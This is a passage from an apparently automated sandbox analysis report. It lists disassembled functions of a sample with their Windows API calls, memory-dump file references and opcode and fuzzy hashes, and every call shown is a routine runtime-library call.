                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 118556049-0
                                                                                                                                                                                            • Opcode ID: 02099fefc077e42117626efb41768b7ae30dc75ed724de26d277f949d2fd5b7d
                                                                                                                                                                                            • Instruction ID: e4220e4c25ab4ea8838820c70aa5df2e87c09364d26c90a49b00d0ee544a18b0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 02099fefc077e42117626efb41768b7ae30dc75ed724de26d277f949d2fd5b7d
                                                                                                                                                                                            • Instruction Fuzzy Hash: B4C17C746187869FC705CF28C490A6AFBE0BF99300F548A1EF986C7315DB71E955CB82
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003683D0 Relevance: 1.8, APIs: 1, Instructions: 300COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00368765
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 118556049-0
                                                                                                                                                                                            • Opcode ID: f65168fc49a3e376791a45d2d44ec1d11ed4525fe851cfb37315e66642e3b2c0
                                                                                                                                                                                            • Instruction ID: d96388e64af4d144048a65e95501122a6944b605e8212a0a8835b5d09e412920
                                                                                                                                                                                            • Opcode Fuzzy Hash: f65168fc49a3e376791a45d2d44ec1d11ed4525fe851cfb37315e66642e3b2c0
                                                                                                                                                                                            • Instruction Fuzzy Hash: C8C17B706187869FC306CF28C48066AFBE0BF99300F548A1EF986C7355EB31E955CB82
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038E9E7 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0038E9E2,?,?,00000008,?,?,003938D0,00000000), ref: 0038EC14
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                                                            • Opcode ID: caaddf8c86fc02356a774ac707d45eac55274ee795d676ab57b9b59f23525b65
                                                                                                                                                                                            • Instruction ID: 3a131b6097e81f7467339a362b47a1ab2dd7d9286b6e7330f58fa64d911bf166
                                                                                                                                                                                            • Opcode Fuzzy Hash: caaddf8c86fc02356a774ac707d45eac55274ee795d676ab57b9b59f23525b65
                                                                                                                                                                                            • Instruction Fuzzy Hash: 63B12C71510709DFD71ADF28C48AB657BE0FF45364F2A8698E89ACF2A1C335E991CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0036A720 Relevance: 1.8, Strings: 1, Instructions: 510COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                                                                            • Opcode ID: 6db7c73ce08339aaa5700da7917c8cc34e2840ebc5b127ec01b7b7fc58230247
                                                                                                                                                                                            • Instruction ID: 5aed134f91d1e3e1c72e1938d8d52c2be215dd8c062b0bbca5d85b26f547d4b9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6db7c73ce08339aaa5700da7917c8cc34e2840ebc5b127ec01b7b7fc58230247
                                                                                                                                                                                            • Instruction Fuzzy Hash: C802AF76D00118AFDF19DFA4DC819FEBBB5EF88314F0A8169F805BB252D6716D018BA4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00374780 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,00000000,811C9DC5,00000000), ref: 00374832
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 626452242-0
                                                                                                                                                                                            • Opcode ID: a2d00ad38e361adb7388db93bfd943bcf886d6dbb573726ace917efe083b9de2
                                                                                                                                                                                            • Instruction ID: cff399b332db66311a58d595eec7d43d338df291623e6bb8caaccafb357106e4
                                                                                                                                                                                            • Opcode Fuzzy Hash: a2d00ad38e361adb7388db93bfd943bcf886d6dbb573726ace917efe083b9de2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1561B4729002189BDB25DB64DC8ABDDB3B4EF49310F1482D5E60DAB291EB75AAC4CF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0037517F Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00375195
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                                                            • Opcode ID: 809e59870bf93071235349f78b2105534dedfe1fd2e32656b3307af5c1abec9f
                                                                                                                                                                                            • Instruction ID: 139fe0e919ea99fd4adbd9497714004ad1ee97b9a218c56824ba8ad7a00d991e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 809e59870bf93071235349f78b2105534dedfe1fd2e32656b3307af5c1abec9f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A516F71A01A058BEB2ACF65D8817AEB7F4FB49350F25C86AD409EB361D7B89940CF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00389AFB Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 07aff6d1553c290a1a10a783e47b39e77437f426b1c4e66b6431f1684cfe6ffa
                                                                                                                                                                                            • Instruction ID: cbdd044f9fa9e754da5b8116dd725b8fb05e2091e16f07de44debd2e44df96ce
                                                                                                                                                                                            • Opcode Fuzzy Hash: 07aff6d1553c290a1a10a783e47b39e77437f426b1c4e66b6431f1684cfe6ffa
                                                                                                                                                                                            • Instruction Fuzzy Hash: E241A2B5805219AFDF25EF69CC89ABABBB9EF45300F1442DAE40DD7201DA359E848F10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00354DB0 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: ,
                                                                                                                                                                                            • API String ID: 0-3772416878
                                                                                                                                                                                            • Opcode ID: 287914b32e3ba21ffebdad04aae9bfba9a70f6aebeb90cc0641aeed20a3bc8f5
                                                                                                                                                                                            • Instruction ID: 93b7d1d543b4b96d0332604b56f70f5d23914f88c0ed3a4e03975d94cdc47d3d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 287914b32e3ba21ffebdad04aae9bfba9a70f6aebeb90cc0641aeed20a3bc8f5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 42E18131A0126A8BCB25CB68CC51BEDFB70AF15300F0442EAD959B7742D7706E98CFA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038D300 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
                                                                                                                                                                                              • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0038D354
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                            • Opcode ID: 918b332856172416d445a7dedc02d2e8459dc7a3855e9dc90a114877b31b68c5
                                                                                                                                                                                            • Instruction ID: 8cbf33359cb3e9c1e27d242edd481b630d48f5073dad86c715f9630e36120716
                                                                                                                                                                                            • Opcode Fuzzy Hash: 918b332856172416d445a7dedc02d2e8459dc7a3855e9dc90a114877b31b68c5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6321A476601306ABDB2ABB25DC82A7A73ACEF45314F1400BAFD01DA185EBB4ED44CB51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00380564 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                                                                            • Opcode ID: 5fb85376299f8e8f09c2a6ac544acb18208e63bedf52167a8e81a277400cdb5a
                                                                                                                                                                                            • Instruction ID: 11f8c609d5a571ec024cdee4bf6a9e49859e119fdf60a7e7f8f4e43754bdfa84
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fb85376299f8e8f09c2a6ac544acb18208e63bedf52167a8e81a277400cdb5a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8FC100309007068FCBAFEF68C49567ABBB5EF81300F250699E4969B691D331AD4DCF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038CF72 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
                                                                                                                                                                                              • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0038D0A0,00000001,00000000,?,-00000050,?,0038D6E1,00000000,?,?,?,00000055,?), ref: 0038CFE4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: 306884e0f7a589b2846fe9bd871d28213b9400e81979bcbb0604e363e2c49350
                                                                                                                                                                                            • Instruction ID: 7f36ad94ad421d50e219746b5203091d816d5bfc1503547e40dd440ce081d3f9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 306884e0f7a589b2846fe9bd871d28213b9400e81979bcbb0604e363e2c49350
                                                                                                                                                                                            • Instruction Fuzzy Hash: C6114C372107059FDB18BF39D8915BABB92FF84368B15442DE64747A40D3717843C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038D52F Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
                                                                                                                                                                                              • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0038D2BC,00000000,00000000,?), ref: 0038D55B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                            • Opcode ID: 888578e11f6349b1d28d8970bb3125dc7d2830bd05dd3db0f5f3aab95660463d
                                                                                                                                                                                            • Instruction ID: ed9b9f392f60677b4a93d3e48cde2177e098d13b58ff520b5ab2a29fe9ef05b1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 888578e11f6349b1d28d8970bb3125dc7d2830bd05dd3db0f5f3aab95660463d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5501FE72610312BBDB297B659C06ABB7758DB41758F15446BEC03A75C0EB34FD41C790
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038D00D Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
                                                                                                                                                                                              • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0038D300,00000001,00000000,?,-00000050,?,0038D6A9,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0038D057
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: ee7048137b8160a6959d7677e5b2f8e7b5e10e2e75be8a32d30d9b1c2ba1f146
                                                                                                                                                                                            • Instruction ID: 0d70ba480c458a1c12f4a94b16b3d98c64973b15f8e68683accb9e56ac624b0e
                                                                                                                                                                                            • Opcode Fuzzy Hash: ee7048137b8160a6959d7677e5b2f8e7b5e10e2e75be8a32d30d9b1c2ba1f146
                                                                                                                                                                                            • Instruction Fuzzy Hash: A8F0F6762003045FDB267F35AC81A7A7BA5EF80768F0544ADF9464B6D1C6B19C42C750
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038694D Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00383F51: EnterCriticalSection.KERNEL32(?,?,0038138C,00000000,003A55D0,0000000C,00381354,?,?,00385224,?,?,00386317,00000001,00000364,?), ref: 00383F60
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00386940,00000001,003A5878,0000000C,00386D75,00000000), ref: 00386985
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                                                                            • Opcode ID: 221d001ad71754c93ba331c25ea4c9831f0f98fd3077f31b576e3fa05a09d5ff
                                                                                                                                                                                            • Instruction ID: bab5c16fff799b8debe3e20bd5b495c54316065ea162f87678fa2225af914478
                                                                                                                                                                                            • Opcode Fuzzy Hash: 221d001ad71754c93ba331c25ea4c9831f0f98fd3077f31b576e3fa05a09d5ff
                                                                                                                                                                                            • Instruction Fuzzy Hash: B2F04932A01304DFD702EF98E842B9D7BF4EB4A720F00419AF415DB2A1DBB999048F40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038CF27 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
                                                                                                                                                                                              • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0038CE80,00000001,00000000,?,?,0038D703,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0038CF5E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: e252d5b591816923ae72f885aacfd8c4bb8a0e702958ff1fe6d65ab6185ba15b
